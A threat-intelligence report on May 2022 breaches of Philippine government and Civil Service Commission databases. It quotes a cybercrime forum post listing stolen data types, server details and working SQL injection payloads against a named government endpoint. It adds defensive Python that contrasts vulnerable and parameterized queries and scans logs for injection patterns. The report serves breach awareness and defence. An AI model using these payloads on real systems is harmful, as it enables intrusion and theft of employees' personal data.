Philippines Government and Civil Service Commission Data Exposed in May 2022

Originally published at: https://cloudsek.com/philippines-government-and-civil-service-commission-data-exposed-in-may-2022/

In May 2022, threat actors targeted the Philippines Government in cyberattacks that exposed sensitive Government data. CloudSEK’s contextual AI digital risk platform XVigil discovered a post on a cybercrime forum advertising compromised data containing sensitive information from the following databases:

  • Government
  • Civil Service Commission

Analysis and Attribution

Information from the Post

Government Data Breach

  • On 9 May 2022, a threat actor published the database of the Philippines Government for the domain https//dole[.]gov[.]ph.
Threat Actor’s post on a cybercrime forum regarding Government Data Breach

 

  • The compromised database contains the following details.
Details Shared
    • Email:Password Combinations
    • Employees
    • Managers
    • Job Titles
    • Employee IDs
    • Comments
    • Department Data
    • Locations
    • DOB/Termination Dates
    • Pay Rates/Types

Civil Service Commission Data Breach

By Database Breach

  • On 15 May 2022, a threat actor published the database of the Civil Service Commission of Philippines for the domain http://csc[.]gov[.]ph.
Threat Actor’s post on a cybercrime forum regarding Civil Service Commission Data Breach

 

  • The threat actor dumped the website for users to share or download and use.
  • The Civil Service Commission (CSC) is the Central Personnel Agency of the Philippines Government, responsible for the policies, plans, and programs concerning all civil service employees.
  • The compromised data, 19121 records in total, includes the following details.
Details Shared
    • Employer ID
    • City ID
    • Department ID
    • Region ID
    • Agency ID
    • Type
    • Token
    • Status
    • Admin
    • Password
    • Username
    • Created Date and many more fields
  • The actor has also shared information about the system including backend details, DBMS, DBMS user, and hostname.
  • Apart from the employee information, other files such as the following were shared.
Other Files Shared
    • Inventory Logs
    • User Logs
    • User Database
    • Agency Accounts
    • MySQL Logins
    • PhpMyAdmin Dump
    • XAMPP Logins
  • Chat logs of employees have also been compromised and published.
  • The actor also mentioned that the site is using plaintext passwords.
  • A threat actor mentioned that the breached data might be from the breach that happened in 2021.
  • However, the publishing threat actor replied that the 2021 breach consisted of sensitive user info without logins and the database was not provided.

By SQL Injection

  • On 15 May 2022, another threat actor on the cybercrime forum shared a similar post, with most of the data probably being the same.
  • However, this data breach was performed by SQL Injection on https//csc[.]gov[.]ph, breaching around one million rows of employee information.
  • Another threat actor mentioned that there were unhashed plain text passwords.
Threat Actor’s post on a cybercrime forum regarding Civil Service Commission Data Breach via SQL Injection
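
The flaw class behind this breach beside its fix, as an added example that is not code from the affected site or from CloudSEK: the appendix lists the GET parameter aid as injectable, and the sketch runs the boolean-based payload quoted there against a query built by string concatenation and against a validated, parameterized one. The agency table, its rows, the function names and the use of SQLite in place of MySQL are assumptions, and the UNION input is a simplified constructed stand-in.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the site's MySQL database (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE agency (aid INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO agency VALUES (?, ?)",
                   [(3094, "Sample Agency A"), (3095, "Sample Agency B")])
    return db

def lookup_vulnerable(db, aid):
    """Flawed pattern: the raw GET value becomes part of the SQL text."""
    sql = "SELECT name FROM agency WHERE aid = " + aid
    return [row[0] for row in db.execute(sql)]

def lookup_hardened(db, aid):
    """Allowlist the type, then bind the value so it is never parsed as SQL."""
    if not (aid.isascii() and aid.isdigit() and len(aid) <= 10):
        raise ValueError("aid must be an unsigned integer")
    rows = db.execute("SELECT name FROM agency WHERE aid = ?", (int(aid),))
    return [row[0] for row in rows]

def compare(db, aid):
    """Return (vulnerable result, hardened result or 'rejected') for one input."""
    try:
        hardened = lookup_hardened(db, aid)
    except ValueError:
        hardened = "rejected"
    return lookup_vulnerable(db, aid), hardened

if __name__ == "__main__":
    db = make_db()
    for value in ("3094",
                  "3094 AND 4076=4076",   # boolean-based payload from the appendix
                  "3094 AND 4076=4077",   # constructed false twin of that payload
                  "-3023 UNION ALL SELECT 'injected'"):  # simplified, constructed
        print(repr(value), "->", compare(db, value))
```

The concatenated query answers the true and false conditions differently, which is the signal boolean-based blind extraction depends on; the hardened lookup rejects both inputs before any SQL runs.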

 

Impact & Mitigation

Impact

  • This sensitive information poses a large-scale risk and could lead to the exposure of critical government infrastructure.
  • It would equip malicious actors with the details required to launch sophisticated ransomware attacks, exfiltrate data, and maintain persistence.
  • If the leaked data is not encrypted, it could enable account takeovers.
  • Commonly used or weak passwords could lead to brute force attacks.
  • PII (Personally Identifiable Information) of the employees belonging to the Government can be used to conduct:
    • Social engineering attacks
    • Phishing attacks
    • Identity theft

Mitigation

  • Scan repositories to identify exposed credentials and secrets.
  • Monitor cybercrime forums for the latest tactics employed by threat actors.
  • Reset the compromised user login credentials and implement a strong password policy for all user accounts.
  • Patch vulnerable and exploitable endpoints.
  • Monitor for anomalies in user accounts, which could indicate possible account takeovers.
  • Audit and monitor all logs of events and incidents to identify unusual patterns and behaviors.
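
One way to carry out the log audit recommended above for the injectable aid parameter listed in the appendix (an added example, not CloudSEK's or the affected site's code): because aid is expected to be an integer, every request whose decoded value is not one gets flagged, and keyword hints only label the likely technique. The log lines, the /report.php path and the addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines; the path is hypothetical and the IPs are
# documentation addresses.
SAMPLE_LOG = """\
198.51.100.7 - - [15/May/2022:10:01:02 +0800] "GET /report.php?aid=3094 HTTP/1.1" 200 5120
203.0.113.9 - - [15/May/2022:10:01:05 +0800] "GET /report.php?aid=3094%20AND%204076%3D4076 HTTP/1.1" 200 5120
203.0.113.9 - - [15/May/2022:10:01:09 +0800] "GET /report.php?aid=3094%3BSELECT%20SLEEP(5)%23 HTTP/1.1" 200 5120
203.0.113.9 - - [15/May/2022:10:01:20 +0800] "GET /report.php?aid=-3023%20UNION%20ALL%20SELECT%20NULL--%20- HTTP/1.1" 200 310
198.51.100.7 - - [15/May/2022:10:02:00 +0800] "GET /index.php HTTP/1.1" 200 900
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Labels only; the decision to flag is made by the integer allowlist below.
HINTS = [
    ("time-based", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("stacked", re.compile(r";")),
    ("union", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("boolean", re.compile(r"\b(and|or)\b\s+\S+\s*=", re.I)),
]

def classify(value):
    """Name the technique(s) a non-integer value resembles."""
    labels = [name for name, rx in HINTS if rx.search(value)]
    return labels or ["non-integer"]

def audit(log_text, param="aid"):
    """Return (source IP, decoded value, labels) for every non-integer param."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target = m.groups()
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in query.get(param, []):
            if not re.fullmatch(r"[0-9]{1,10}", value):
                findings.append((ip, value, classify(value)))
    return findings

if __name__ == "__main__":
    for ip, value, labels in audit(SAMPLE_LOG):
        print(ip, labels, repr(value))
```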

Appendix

System Information:

Quote:

Backend System: Windows 10

DBMS: MySQL 5.5

Hostname: WIN-NEJB836KBNF

DBMS User: ‘jmonses@localhost’

Info Provided:

Quote:

Inventory Logs

User Logs

User Database

Agency Accounts

MySQL Logins

PhpMyAdmin Dump

XAMPP Logins

FreiChat Chat Logs

Employee Dump (includes full name, addresses, usernames, personal emails, agency and government employed emails)

And More

File Structure:

Quote:

.
|-- cdcol
|   `-- cds.csv
|-- csc_cdris
|   |-- tblref_subcat.csv
|   |-- tblref_subcat_topic.csv
|   |-- tblref_topic.csv
|   |-- tblresource_master.csv
|   |-- tblusers.csv
|   |-- vw_resource_master.csv
|   |-- vw_subcat_category.csv
|   `-- vw_subcat_topics.csv
|-- csc_guestchat
|   |-- frei_banned_users.csv
|   |-- frei_chat.csv
|   |-- frei_config.csv
|   |-- frei_groupchat.csv
|   |-- frei_rooms.csv
|   |-- frei_session.csv
|   |-- frei_smileys.csv
|   |-- frei_video_session.csv
|   |-- frei_video_session.csv.1
|   |-- frei_webrtc.csv
|   `-- frei_webrtc.csv.1
|-- csc_ighrsdb
|   |-- ref_2020inventorysummary.csv
|   |-- ref_2021inventorysummary_asof_aug16.csv
|   |-- tbl_agencyaccounts.csv
|   |-- tbl_agencyinventory_logs.csv
|   |-- tbl_personnel2.csv
|   |-- tbl_plantilla_jocos.csv
|   |-- tbl_userlogs.csv
|   |-- vw_agencyinventory_logs.csv
|   |-- vw_cscfoaccounts.csv
|   `-- vw_plantilla_sec_uploading_count.csv
|-- csc_ighrsdb_aug312020
|-- mysql
|   `-- user.csv
|-- performance_schema
|   `-- accounts.csv
|-- phpmyadmin
|   |-- pma_bookmark.csv
|   |-- pma_column_info.csv
|   |-- pma_designer_coords.csv
|   |-- pma_history.csv
|   |-- pma_pdf_pages.csv
|   |-- pma_recent.csv
|   |-- pma_relation.csv
|   |-- pma_table_coords.csv
|   |-- pma_table_info.csv
|   |-- pma_table_uiprefs.csv
|   |-- pma_tracking.csv
|   |-- pma_userconfig.csv
|   `-- pma_userconfig.csv.1
`-- webauth
    `-- user_pwd.csv

9 directories, 46 files

Data Sample by SQL Injection

DBs Contain

– info of every PH government employee (tbl_personnel, tbl_personnel2) (firstname, lastname, gender, TIN, SSS, agency, citizenship, salary, phone#, email, v3accesskey, etc..)

– agency account logins for IGHRS panel, can manage all data from that agency

– employee chat logs

bunch more you can see below

web server operating system: Windows

web application technology: PHP 5.5.9, Apache 2.4.7

back-end DBMS: MySQL >= 5.5

Parameter: aid (GET)

Type: boolean-based blind

Title: AND boolean-based blind – WHERE or HAVING clause

Payload: aid=3094 AND 4076=4076

Type: error-based

Title: MySQL >= 5.5 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)

Payload: aid=3094 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71786a7871,(SELECT (ELT(5016=5016,1))),0x7162627671,0x78))s), 8446744073709551610, 8446744073709551610)))

Type: stacked queries

Title: MySQL >= 5.0.12 stacked queries (comment)

Payload: aid=3094;SELECT SLEEP(5)#

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: aid=3094 AND (SELECT 1742 FROM (SELECT(SLEEP(5)))SnYj)

Type: UNION query

Title: Generic UNION query (NULL) – 1 column

Payload: aid=-3023 UNION ALL SELECT CONCAT(0x71786a7871,0x5558597156435a75594377414f4c7151614d4655626d675a7a4d6f766f6466414364415972426757,0x7162627671)– –

Database: information_schema

Database: cdcol

Database: csc_cdris

Database: csc_guestchat

Database: performance_schema

Database: phpmyadmin

Database: webauth

Database: csc_ighrsdb

Database: mysql

Database: csc_ighrsdb_aug312020

Database: csc_lookupdb
